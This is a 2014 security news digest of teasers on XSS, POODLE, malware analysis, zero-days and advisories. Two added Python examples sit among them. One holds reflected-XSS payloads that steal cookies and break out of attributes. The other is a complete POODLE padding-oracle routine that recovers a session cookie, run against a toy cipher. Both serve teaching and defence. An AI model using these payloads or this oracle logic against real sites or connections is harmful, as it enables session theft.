EBAY REFLECTED XSS
Earlier in the year, I discovered an XSS vulnerability in the Selling Manager section of eBay. The problem was caused by improper escaping of the URL’s GET parameters, which were reflected back on...
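The bug class in the teaser above (a GET parameter reflected into the page without escaping) as an added Python example; this is not code from the eBay post. The page template, the `q` parameter, the `example.test` URL and the two payloads are made up for illustration.

```python
"""Reflected XSS from an unescaped GET parameter, beside the escaped rendering.
Added example, not from the linked post; the template, parameter name and
host are invented."""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed template that reflects the parameter in two contexts:
# element text and a double-quoted attribute value.
TEMPLATE = '<h1>Results for {term}</h1>\n<input name="q" value="{term}">'

# Constructed payloads, one per context.
SCRIPT = "<script>alert(document.cookie)</script>"
ATTR_BREAKOUT = '" autofocus onfocus="alert(1)'


def search_url(payload):
    """Build the URL a victim would be sent to (payload percent-encoded)."""
    return "https://example.test/search?q=" + quote(payload)


def query_param(url, name):
    """Return the decoded value of one GET parameter, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    """Reflects the raw parameter: the bug in the teaser."""
    return TEMPLATE.format(term=query_param(url, "q"))


def render_escaped(url):
    """html.escape(quote=True) neutralises < > & and both quote characters,
    which is the right escaping for text nodes and quoted attribute values.
    It is NOT enough for href/src URLs or JavaScript string contexts."""
    return TEMPLATE.format(term=html.escape(query_param(url, "q"), quote=True))


def reflects_verbatim(rendered, payload):
    """The check a scanner makes: did the payload come back untouched?"""
    return payload in rendered


def demo():
    """Map each context to (vulnerable reflects, escaped reflects)."""
    results = {}
    for name, payload in (("element", SCRIPT), ("attribute", ATTR_BREAKOUT)):
        url = search_url(payload)
        results[name] = (
            reflects_verbatim(render_vulnerable(url), payload),
            reflects_verbatim(render_escaped(url), payload),
        )
    return results


if __name__ == "__main__":
    print(demo())
```

The escaped renderer closes both the element and the attribute case only because the attribute is quoted; an unquoted attribute would still be breakable with whitespace, and URL or script contexts need their own encoders rather than `html.escape`.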

Truly scary SSL 3.0 vuln to be revealed soon: sources
Gird your loins, sysadmins: The Register has learned that news of yet another major security vulnerability - this time in SSL 3.0 - is probably imminent.Maintainers have kept quiet about the...

How VPN Pivoting Works (with Source Code)
A VPN pivot is a virtual network interface that gives you layer-2 access to your target’s network. Rapid7’s Metasploit Pro was the first pen testing product with this feature. Core Impact has this...

two browser mem disclosure bugs (CVE-2014-1580 and CVE-something-or-other)
First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that caused Firefox prior to version 33 (released today) to leak bits of uninitialized memory when rendering certain types of truncated images onto...

MindshaRE: Statically Extracting Malware C2s Using Capstone Engine
It’s been far too long since the last MindshaRE post, so I decided to share a technique I’ve been playing around with to pull C2 and other configuration information out of malware that does not store...

Two Limited, Targeted Attacks; Two New Zero-Days
The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel, with Microsoft...

BSRT-2014-008 Vulnerability in BlackBerry World service affects BlackBerry 10...
This advisory addresses a spoofing vulnerability that is not currently being exploited but affects BlackBerry 10 smartphone customers running the BlackBerry World app.

MSRT October 2014 – Hikiti
The October release of the Malicious Software Removal Tool (MSRT) is directly related to a Coordinated Malware Eradication (CME) initiative led by Novetta and with the help of many other security...

[SE-2014-01] Breaking Oracle Database through Java exploits (details)
Oracle Oct 2014 CPU addresses 22 security issues affecting Java VM implementation embedded in Oracle Database software. We have published details of the fixed issues and a description of some privilege...

One Doesn't Simply Analyze Moudoor
Today we are pleased to see an important milestone reached in a coordinated campaign against a sophisticated and well-resourced cyber espionage group. We have recently been participating in a...

Analysis of the Linux backdoor used in freenode IRC network compromise
freenode is a large IRC network providing services to Free and Open Source Software communities, and in September the freenode staff team blogged about a potential compromise of an IRC server. NCC...

Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities
Document Title:
===============
Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1303

Release...

Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML Vulnerability
Document Title:
===============
Paypal Inc MultiOrderShipping API - Filter Bypass & Persistent XML Vulnerability

References...

PayPal Inc BB #98 MOS - Persistent Settings Vulnerability
Document Title:
===============
PayPal Inc BB #98 MOS - Persistent Settings Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=983

Release...

Metasploit: Microsoft Bluetooth Personal Area Networking (BthPan.sys)...
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require...

Gameover Zeus Accessorizes at Vogue.com
Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp://media.vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe

Attack of the week: POODLE
Believe it or not, there's a new attack on SSL. Yes, I know you're thunderstruck. Let's get a few things out of the way quickly. First, this is not another Heartbleed. It's bad, but it's not going to...

Gmail’s SMTPUTF8 prone to homographic attacks (thanks, 4chan!)
I always loved working with Google. I have been participating in their program since 2012. Over the years, I addressed some nice vulnerabilities that got me a couple of hall of fame entries and of...

POODLE attacks on SSLv3
My colleague, Bodo Möller, in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers), just posted details about a padding oracle attack against CBC-mode ciphers in SSLv3. This attack,...
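Both POODLE items above (the "Attack of the week" write-up and the Google post by Möller, Duong and Kotowicz) describe a padding oracle against CBC-mode ciphers in SSLv3. The following is an added Python example, not code from either post, showing the mechanism: an SSLv3 receiver checks only the final padding-length byte, so an attacker who can copy a chosen ciphertext block over a full block of padding learns one plaintext byte per accepted record, while a TLS receiver that checks every padding byte rejects the same forgery. It uses a toy block cipher in place of AES, HMAC-SHA1 in place of the SSLv3 MAC, and a fresh random IV per record instead of SSLv3's chained IV; none of these choices affect the oracle. The key, cookie and function names are all assumptions made for the example.

```python
"""SSLv3 vs TLS CBC padding checks and the POODLE byte-recovery loop.
Added example, not from the POODLE posts. Toy block cipher (NOT AES),
HMAC-SHA1 standing in for the SSLv3 MAC, fresh random IV per record
(real SSLv3 chains IVs); the padding-oracle logic depends on none of these."""
import hashlib, hmac, os, random

BLOCK, MAC_LEN = 16, 20


class ToyBlockCipher:
    """Keyed byte substitution then byte permutation; invertible, toy only."""
    def __init__(self, key):
        rng = random.Random(hashlib.sha256(key).hexdigest())
        self.sbox = list(range(256)); rng.shuffle(self.sbox)
        self.inv = {v: i for i, v in enumerate(self.sbox)}
        self.perm = list(range(BLOCK)); rng.shuffle(self.perm)

    def encrypt_block(self, b):
        out = bytearray(BLOCK)
        for i, p in enumerate(self.perm):
            out[p] = self.sbox[b[i]]
        return bytes(out)

    def decrypt_block(self, b):
        out = bytearray(BLOCK)
        for i, p in enumerate(self.perm):
            out[i] = self.inv[b[p]]
        return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(cipher, iv, data):
    out, prev = b"", iv
    for k in range(0, len(data), BLOCK):
        prev = cipher.encrypt_block(xor(data[k:k + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(cipher, iv, data):
    out, prev = b"", iv
    for k in range(0, len(data), BLOCK):
        out += xor(cipher.decrypt_block(data[k:k + BLOCK]), prev)
        prev = data[k:k + BLOCK]
    return out

def ssl3_seal(cipher, mac_key, plaintext):
    """MAC-then-encrypt. SSLv3 padding: arbitrary bytes, then one length byte."""
    data = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    padlen = (BLOCK - 1 - len(data) % BLOCK) % BLOCK
    data += os.urandom(padlen) + bytes([padlen])   # padding bytes are undefined in SSLv3
    iv = os.urandom(BLOCK)
    return iv, cbc_encrypt(cipher, iv, data)

def _mac_ok(mac_key, body):
    if len(body) < MAC_LEN:
        return False
    tag = hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha1).digest()
    return hmac.compare_digest(tag, body[-MAC_LEN:])

def ssl3_open(cipher, mac_key, iv, ct):
    """SSLv3 receiver: only the length byte is checked, never the padding bytes."""
    data = cbc_decrypt(cipher, iv, ct)
    padlen = data[-1]
    if padlen >= BLOCK:
        return False
    return _mac_ok(mac_key, data[:len(data) - padlen - 1])

def tls_open(cipher, mac_key, iv, ct):
    """TLS receiver: every padding byte must equal the length byte."""
    data = cbc_decrypt(cipher, iv, ct)
    padlen = data[-1]
    if padlen + 1 > len(data) or any(b != padlen for b in data[-(padlen + 1):]):
        return False
    return _mac_ok(mac_key, data[:len(data) - padlen - 1])

def make_victim(cipher, mac_key, secret):
    """Victim browser: attacker JS picks the filler lengths, the browser appends
    the secret cookie and encrypts a fresh record for every request."""
    return lambda front, back: ssl3_seal(cipher, mac_key, b"A" * front + secret + b"B" * back)

def poodle_recover_byte(send, oracle, secret_len, idx, max_tries=40000):
    front = (BLOCK - 1 - idx) % BLOCK               # secret[idx] becomes last byte of block i
    back = -(front + secret_len + MAC_LEN) % BLOCK  # record then ends with a full padding block
    i = (front + idx) // BLOCK
    for _ in range(max_tries):
        iv, ct = send(front, back)
        blocks = [iv] + [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]
        forged = ct[:-BLOCK] + blocks[i + 1]        # copy C_i over the padding block
        if oracle(iv, forged):                      # accepted iff D(C_i)[15] ^ C_{n-1}[15] == 15
            return (BLOCK - 1) ^ blocks[-2][-1] ^ blocks[i][-1]   # = P_i[15]
    return None

def poodle_recover(send, oracle, secret_len, max_tries=40000):
    out = bytearray()
    for idx in range(secret_len):
        b = poodle_recover_byte(send, oracle, secret_len, idx, max_tries)
        if b is None:
            return None
        out.append(b)
    return bytes(out)

def demo():
    """Recover the cookie through an SSLv3 receiver; fail against a TLS receiver."""
    cipher, mac_key, secret = ToyBlockCipher(b"server key"), b"mac key", b"SESSION=s3cr3t"
    send = make_victim(cipher, mac_key, secret)
    ssl3 = lambda iv, ct: ssl3_open(cipher, mac_key, iv, ct)
    tls = lambda iv, ct: tls_open(cipher, mac_key, iv, ct)
    return poodle_recover(send, ssl3, len(secret)), poodle_recover(send, tls, len(secret), 300)

if __name__ == "__main__":
    print(demo())
```

Each forged record is accepted with probability 1/256 (exactly when the last decrypted byte equals 15), so the loop needs about 256 victim requests per cookie byte, which is the cost the posts quote. Against `tls_open` the same forgery would need all sixteen bytes of the copied block to decrypt to 15, so the attack never lands; that is why the fix is to disable SSLv3 (or negotiate with TLS_FALLBACK_SCSV) rather than to patch the cipher.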

Userland rootkits: Part 1, IAT hooks
This is the first part of this series about Userland rootkits. I wanted to write on it and demonstrate how some rootkits hide files by using IAT hooks. This post is about a classic trick, known...